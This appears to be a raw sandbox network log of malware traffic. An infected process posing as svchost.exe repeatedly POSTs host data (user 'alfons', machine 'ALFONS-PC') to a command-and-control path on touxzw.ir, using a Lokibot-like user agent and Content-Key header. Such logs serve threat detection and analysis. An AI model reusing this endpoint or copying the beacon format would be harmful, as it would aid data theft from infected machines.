Feb 25, 2025 15:38:07.690881014 CET	846	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:38:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gAsXbPLrD%2FCYixf2OmIcVnyuwtHTdCchcSmjal3cV%2FjXs94wbjGklJxtB8V1hk%2B2UWAt1WRNWTxtc2JW9j3MB%2B3yt0zLNNdYOsyyCLAuCZ8xWKDkGoY9EO%2FOQ6Y%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91786fefd923424b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1601&min_rtt=1601&rtt_var=800&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	50010	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:38:08.838928938 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:38:08.844856977 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:38:09.620604992 CET	841	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:38:09 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8cm8KYAPtKsCgxOfV%2Bxb641PHesnWFkpmhx07vvIoJhPUJb2Mn8ZOSmFMMcMmYrhKJqqQYdL9VWRALr5Yf2oV%2FxkZMLMoTRnvoEooKep5ZY24TnMfuKElSG4GiI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91786ffbdbd1ef9d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3194&min_rtt=3194&rtt_var=1597&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=165&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	50011	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:38:10.796184063 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:38:10.801171064 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:38:11.587085009 CET	847	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:38:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sTsvaU7KXKHE%2F36P5MjKebTEMNP7qFqR8fO2DUQucqms%2BKBE3hJXevd4w4qZEIZb%2BwHF3iewQ7PX3y6404ZW9iKljv%2B%2FB07MaWgqidVogUH96l1IfUFUSETiZWo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91787007f9eb42f4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2492&min_rtt=2492&rtt_var=1246&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	50012	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:38:12.730777979 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:38:12.738105059 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:38:13.468926907 CET	817	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 14:38:13 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/scc1/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hKnO%2FvGTySZjtSN6BeQTvmYPExzyYju46a5gN75rLmqt2HaaO0VLPz2xr7VwamPnH8EscPH03dUDYlxwKKziDdNlSf7Pahtvt1mHv7lJgnBoa3ZmNrHBWdeDKRo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 917870141db68c23-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2021&min_rtt=2021&rtt_var=1010&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	50013	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:38:14.635822058 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:38:14.640871048 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:38:15.300654888 CET	850	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:38:15 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S3B53RQ1pMXCtCn%2BEuV%2BPRNLMMrRm2Ez6tvc%2B5476qz9vEm%2Fs%2BVSWQI82C39KuWwNCBhIYJ9E%2Bk2SidmQ81ltSQHIeJDgQ%2FVmJDe68BpwnErL1nmAJcfPM098Jg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9178702009d442a9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1582&rtt_var=791&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=122&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	50014	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:38:16.450267076 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:38:16.455339909 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:38:17.250334978 CET	852	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:38:17 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7OYSlbiC3czDhYc5oQ9Z7H%2FO9a%2FR5Lju%2FsvVY9%2FzklgIbZObvFM916URLi5ZNgvGsbi2oU434RYSn424k%2FYK9Xem2DqHD6F7Qr%2BnN8Pq2uBeNGaBYqyAQg7FFKo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9178702b9dca7279-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=38107&min_rtt=38107&rtt_var=19053&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	50015	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:38:18.416731119 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:38:18.421744108 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:38:19.189032078 CET	842	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:38:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FVOCtsaAWHOhCWTbkSTsH6sz3KJ%2F1nHZ5dYvEqXNG3NNCfSo86Aw4O4Wd7OfRrLzKdrlzusvtSDCQte%2BSCBVzXNiSbkgePO3a9pKq5MjLBp7hK5GU%2FkqZycpSlo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91787037a85a0cba-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1481&min_rtt=1481&rtt_var=740&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	50016	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:38:20.369366884 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:38:20.374351025 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:38:21.132527113 CET	821	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 14:38:21 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/scc1/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MEWy2XTwWWSaht0GemAFP5JyNNTu1fpZ7CG3uIcUNQVydhP551z5EfeBxh8LyFwhiCV3X1Z31dEMDwfkW2y430N%2FK3Bt%2FCuLtKKs%2FKmCX246GczOWNRSjFeMIlM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91787043d81a1a48-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2147&min_rtt=2147&rtt_var=1073&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=181&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	50017	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:38:22.280528069 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:38:22.285474062 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:38:23.046591043 CET	845	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:38:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0zHKX1uxoFTpNct%2BkOJkXQc0dDRrtnG%2BC6xTUDbGcoxWR5ImTpAf94Y2tg5yhZjswjPBBKQJzjQ8K1QZoj6wnmmGgID17Agkv%2BM9nQUdNe0rUZ5cf%2FCvjtZZ9MM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9178704fca997d18-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2042&min_rtt=2042&rtt_var=1021&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	50018	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:38:24.202914000 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:38:24.210908890 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:38:24.975321054 CET	837	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:38:24 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5EFOLEhZRdwSx4fbeYvEdFmEnSRspKVGtKSXZoyHjHW2WJXVk4ZBxK09wgrZqpsUavWQvs3fRwx2BezJV0oMTOqru%2F0J5jatPFCpmSO85hSKMGhk48cKWo7WvM4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9178705bdb3c4387-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1644&min_rtt=1644&rtt_var=822&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=98&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	50019	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:38:26.123744965 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:38:26.128726959 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:38:26.761888027 CET	850	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:38:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WMYoMJs9S52ya6%2Fx%2FcSg6If3ofh9qbp5YvA%2BHCZ4UI%2BaFXq2CGi0XVv8rcTNyB%2FbchJQXRIe%2FleRg%2B3QBtgDk5YvbJOvk8H9tBhbbIPpqXxoawSpE7HC82ENZPA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91787067d9b642dc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1586&min_rtt=1586&rtt_var=793&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	50020	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:38:27.925673008 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:38:27.930674076 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:38:29.017333984 CET	846	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:38:28 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=85Hm%2BTZIyd8P6EPbHFaVZ%2B5qyLnJRuCqSRy4PXqTsMY2PRdJn8nAEWUqRKgbezLZWUD3CLa31KwGfJsN5Y2jtUM3fXN%2F2r4FXetYgBdb8Ay8cXg3IkKA6rj4m18%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91787074abc70f60-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=34860&min_rtt=34860&rtt_var=17430&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	50021	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:38:30.187870979 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:38:30.192909956 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:38:30.915257931 CET	816	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 14:38:30 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/scc1/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7QLkQhOyrWzm85tDpfVFeL%2FSOKN72nn55ijZkI1eBayMpBEMEJgKJbLJf6w8zUPEIlXrPpM3XV7Q83dbPmpk6MdDYDVORfZxc39FBycMq0QMHgUgNsZQPrVYpwA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 917870812e7b43bc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1851&min_rtt=1851&rtt_var=925&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	50022	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:38:32.065331936 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:38:32.070313931 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:38:32.856038094 CET	852	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:38:32 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gDPZyNjX%2BQ%2BUufFYIDh8tQutmNI6g6AmYmJobfuN8Pw5iOgpUZrX%2FbbC74hXgfoH7DdVa4Q64nBC1MNiJY6w1VdS5fcIKjTfkQ5%2BCRV%2BAMjuS7%2Fyjv%2Fj7f%2BJckQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9178708cfbfc4291-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1608&min_rtt=1608&rtt_var=804&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not 